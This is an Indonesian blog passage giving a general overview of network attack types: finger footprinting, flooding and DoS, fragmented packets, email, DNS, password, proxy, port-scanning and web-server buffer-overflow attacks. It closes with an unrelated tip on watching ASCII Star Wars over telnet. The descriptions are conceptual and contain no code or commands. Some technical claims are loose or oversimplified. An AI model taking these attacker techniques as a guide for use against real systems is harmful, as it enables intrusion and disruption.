Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.
Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.
Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.
9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.
11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.
12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.
13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
MENONTON FILM STARS WARS DI CMD
Bukak run => tulis telnet
tulis o lalu enter
Tulis towel.blinkenlights.nl
Lalu tekan enter dan tunggu uji conesi nya
Ta –da
Selamat menikmati…
Langganan:
Postingan (Atom)
